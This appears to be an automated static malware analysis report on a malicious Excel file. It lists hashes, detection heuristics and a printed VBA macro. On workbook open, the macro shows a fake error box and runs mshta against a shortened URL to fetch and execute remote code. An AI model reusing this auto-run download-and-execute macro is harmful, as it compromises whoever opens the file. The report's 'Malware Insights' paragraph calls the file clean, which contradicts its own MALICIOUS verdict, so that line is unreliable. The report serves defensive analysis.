Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 d685747fcfcdf80f…

MALICIOUS

Office (OOXML) / .XLSX

Size: 35.5 KB
Created: 2015-06-05 18:17:20 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-10-27
MD5: 231cec4f63028cdcdac30caa196d45b0
SHA-1: 40e0a297b92c7ed3451f0e2aec37edb06018bf55
SHA-256: d685747fcfcdf80f50b8611fa8f6d992a0d702330a117cb137d8cce80594e696
Risk Score: 230

Malware Insights

Static analysis of the XLSX file revealed no malicious heuristics, scripts, or embedded content. The file metadata indicates it was created by Microsoft Excel and has a clean verdict.

Heuristics (7)

  • VBA project inside OOXML (severity: medium; 5 related findings; rule: OOXML_VBA)
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/kokokokook.b)
  • Potential Shell call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Matched line in script: Debug.Print (Shell(X + Y + Z))
  • LOLBin reference in VBA (severity: critical; rule: OLE_VBA_LOLBIN)
    Matched line in script: X = "mshta  "
  • VBA project part renamed to evade filename detection (severity: high; rule: OOXML_VBA_PROJECT_RENAMED)
    The VBA project is bound through the OOXML relationship/content type, but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming the part hides the macros from path-only scanners (a technique observed in the SVCReady loader).
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (severity: low; rule: OLE_VBA_WBOPEN)
    Matched line in script: Private Sub Workbook_Open()
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: https://www.bitly.com/ (found in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 897 bytes
SHA-256: b84e30a0477df22f4383b3ac7808015f4d961b5f78f3d8a9863ff85ccbdd8170
Preview of extracted script (first 1,000 lines):
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Debug.Print MsgBox("ERROR!", vbOKCancel); returns; 1
Dim X As String
Dim Y As String
Dim Z As String
X = "mshta  "
Y = "https://www.bitly.com/"
Z = "kddjkkdowkdowkdwwi"
Debug.Print X
Debug.Print Y
Debug.Print Z
Debug.Print (Shell(X + Y + Z))
End Sub
Filename | Kind | Source | Size
vbaProject_00.bin | vba-project | OOXML VBA project: xl/kokokokook.b | 14848 bytes
SHA-256: efd5fe28ac30904f4e75f53b07be50dc7d53c6b12f266c0717dbff7bf5fc63b9